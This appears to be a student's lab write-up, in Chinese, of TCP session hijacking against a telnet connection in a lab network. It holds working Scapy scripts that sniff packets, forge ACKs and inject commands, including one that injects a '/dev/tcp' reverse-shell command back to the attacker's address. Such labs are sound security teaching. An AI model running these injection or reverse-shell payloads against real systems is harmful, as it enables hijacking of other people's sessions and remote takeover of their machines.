# Task 3: TCP Session Hijacking

1. 使用sniff自动捕获telnet的包，
2. 根据捕获的包内容设置伪造包的源目地址
3. 设置好seq和ack号
4. data数据在telnet连接中被当作命令执行，所以在这里注入恶意代码，写入一段话到具体目录下面

具体程序代码如下：
```python
#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
        ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
        tcp = TCP(sport=pkt[TCP].dport, dport=23,
              flags="A",
              seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
        data = "echo \"hijacked!\" >> ~/malicious.out\n\0"
        pkt = ip/tcp/data
        ls(pkt)
        send(pkt, verbose=0)

f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-d277ca74e6d7', filter=f, prn=spoof_pkt)

```

首先使用一个host和victim产生一个telnet连接：

![](https://raw.githubusercontent.com/kryonsir/handsonsecuritylab/master/lab4/image/1.png)

在attacker上输入如下命令，发动攻击：
```shell
python3 tcphijack.py
```

查看结果：

![](https://raw.githubusercontent.com/kryonsir/handsonsecuritylab/master/lab4/image/2.png)


说明攻击成功

# Task 4: Creating Reverse Shell using TCP Session Hijacking

把Task 3 中的注入命令换成可以产生反向shell的命令

```shell
/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1
```

具体代码如下：

```python
#!/usr/bin/env python3
from scapy.all import *

def spoof_pkt(pkt):
        ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
        tcp = TCP(sport=pkt[TCP].dport, dport=23, flags="A", seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
        data = "/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1\n\0"
        pkt = ip/tcp/data
        send(pkt, verbose=0)

f = f'tcp and src host 10.9.0.5'
pkt = sniff(iface='br-d277ca74e6d7', filter=f, prn=spoof_pkt)
```
在attacker上打开监听端口：

![](https://github.com/kryonsir/handsonsecuritylab/blob/master/lab4/image/7.png?raw=true)

执行攻击：

![](https://github.com/kryonsir/handsonsecuritylab/blob/master/lab4/image/4.png?raw=true)

用另一个host和victim进行telnet连接：

![](https://github.com/kryonsir/handsonsecuritylab/blob/master/lab4/image/5.png?raw=true)

反向shell成功连接到attacker，输入命令验证：

![](https://github.com/kryonsir/handsonsecuritylab/blob/master/lab4/image/6.png?raw=true)

这个文件是Task 3中传入victim中的，说明attacker成功使用反向shell连接到victim

